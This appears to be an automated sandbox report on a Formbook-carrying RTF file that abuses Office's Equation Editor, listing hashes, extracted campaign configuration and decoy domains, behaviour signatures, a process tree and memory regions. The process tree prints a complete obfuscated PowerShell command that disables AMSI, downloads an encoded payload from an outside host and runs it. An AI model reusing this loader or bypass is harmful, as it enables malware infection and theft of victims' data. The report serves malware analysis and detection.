Analysis

  • max time kernel
    156s
  • max time network
    170s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    31-01-2022 07:25

General

  • Target

    GMC_310182973.rtf

  • Size

    2.2MB

  • MD5

    0d4881e7b37cf348025ff29b7c5e68c4

  • SHA1

    9a74be8ce26251344f990e852ce1a782f73c7555

  • SHA256

    1b5b296d23666b420cce79e0e953acc3ee864d7718ff7cfab7146ee85bb8b0f6

  • SHA512

    7199b588a2ae25bf0968e04d05dfc71a2b7146b0fd8fda60363064272d625fe73ff3deedddcb7340b931c3e7c9ee29b27340e9d02ac0853cf6881ab002469161

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

m16a

Decoy

ton-pool.sbs

upyourallydesigns.com

pse575.info

travelbucket.online

achievemint.club

qidashuixiang.com

amytreharne.com

gaadroo.store

parallelepc.info

vizminingcorp.com

orlandoheaslth.com

landsharksafterdark.com

sdjinmen.com

alpencruiser.biz

xn--ar-7ka.com

9avatar.xyz

changyixin.com

radiofreetotebag.com

emailmarketer.info

recomin.online

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata: ET MALWARE FormBook CnC Checkin (GET)

  • Formbook Payload 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1216
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\GMC_310182973.rtf"
      2⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1036
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        3⤵
          PID:1632
      • C:\Windows\SysWOW64\cmmon32.exe
        "C:\Windows\SysWOW64\cmmon32.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:516
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\WINDOWS\syswow64\calc.exe"
          3⤵
            PID:1488
      • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        1⤵
        • Launches Equation Editor
        • Suspicious use of WriteProcessMemory
        PID:1060
        • C:\Windows\SysWOW64\CmD.exe
          CmD.exe /C cscript %tmp%\Client.vbs A C
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:832
          • C:\Windows\SysWOW64\cscript.exe
            cscript C:\Users\Admin\AppData\Local\Temp\Client.vbs A C
            3⤵
              PID:688
        • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
          Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$48858585894949338299283838383838383894949485854=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,100,114,111,112,109,98,46,99,111,109,47,102,105,108,101,115,47,56,56,101,55,98,57,56,99,50,98,51,102,55,55,57,54,53,97,52,99,55,54,55,54,97,99,51,51,102,53,102,48,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($48858585894949338299283838383838383894949485854)|I`E`X
          1⤵
          • Process spawned unexpected child process
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1364
          • C:\WINDOWS\syswow64\calc.exe
            "{Path}"
            2⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:2028

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Execution

        Exploitation for Client Execution

        1
        T1203

        Defense Evasion

        Modify Registry

        1
        T1112

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Client.vbs
          MD5

          f02939edfe5733a355e169022534f36d

          SHA1

          0e480b286c943159f8ea3266a17d97acdf996332

          SHA256

          1b12386122c5e6fa06d67307db98fab764ad65f9b5d756768c5d6c013f826be3

          SHA512

          d05397c17a74a24bdb28b44a791582f665b5d8bda9d89758126dc050b1806d5478d88422a61fb0e2ec84d09379b1608ff3a81cc1c034811831ad882a870222a7

        • memory/516-87-0x0000000002100000-0x0000000002193000-memory.dmp
          Filesize

          588KB

        • memory/516-84-0x0000000000120000-0x000000000012D000-memory.dmp
          Filesize

          52KB

        • memory/516-85-0x00000000000D0000-0x00000000000FF000-memory.dmp
          Filesize

          188KB

        • memory/516-86-0x0000000001DF0000-0x00000000020F3000-memory.dmp
          Filesize

          3.0MB

        • memory/1036-57-0x0000000075531000-0x0000000075533000-memory.dmp
          Filesize

          8KB

        • memory/1036-89-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

        • memory/1036-54-0x0000000072BD1000-0x0000000072BD4000-memory.dmp
          Filesize

          12KB

        • memory/1036-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

        • memory/1036-55-0x0000000070651000-0x0000000070653000-memory.dmp
          Filesize

          8KB

        • memory/1216-90-0x000007FEF66E0000-0x000007FEF6823000-memory.dmp
          Filesize

          1.3MB

        • memory/1216-88-0x00000000069D0000-0x0000000006AAA000-memory.dmp
          Filesize

          872KB

        • memory/1216-91-0x000007FF415C0000-0x000007FF415CA000-memory.dmp
          Filesize

          40KB

        • memory/1216-83-0x0000000007820000-0x0000000007959000-memory.dmp
          Filesize

          1.2MB

        • memory/1216-80-0x00000000074E0000-0x000000000763F000-memory.dmp
          Filesize

          1.4MB

        • memory/1364-73-0x0000000002494000-0x0000000002495000-memory.dmp
          Filesize

          4KB

        • memory/1364-67-0x000000000246B000-0x000000000248A000-memory.dmp
          Filesize

          124KB

        • memory/1364-61-0x000007FEFC0E1000-0x000007FEFC0E3000-memory.dmp
          Filesize

          8KB

        • memory/1364-63-0x0000000002460000-0x0000000002462000-memory.dmp
          Filesize

          8KB

        • memory/1364-64-0x0000000002462000-0x0000000002464000-memory.dmp
          Filesize

          8KB

        • memory/1364-72-0x000000000248F000-0x0000000002490000-memory.dmp
          Filesize

          4KB

        • memory/1364-65-0x0000000002464000-0x0000000002467000-memory.dmp
          Filesize

          12KB

        • memory/1364-71-0x000000000248E000-0x000000000248F000-memory.dmp
          Filesize

          4KB

        • memory/1364-62-0x000007FEF32A0000-0x000007FEF3DFD000-memory.dmp
          Filesize

          11.4MB

        • memory/1364-66-0x000000001B740000-0x000000001BA3F000-memory.dmp
          Filesize

          3.0MB

        • memory/1364-70-0x0000000002491000-0x0000000002492000-memory.dmp
          Filesize

          4KB

        • memory/1364-69-0x0000000002492000-0x0000000002494000-memory.dmp
          Filesize

          8KB

        • memory/2028-78-0x00000000007D0000-0x0000000000E63000-memory.dmp
          Filesize

          6.6MB

        • memory/2028-82-0x00000000001D0000-0x00000000001E4000-memory.dmp
          Filesize

          80KB

        • memory/2028-81-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/2028-79-0x0000000000190000-0x00000000001A4000-memory.dmp
          Filesize

          80KB

        • memory/2028-76-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/2028-75-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/2028-74-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB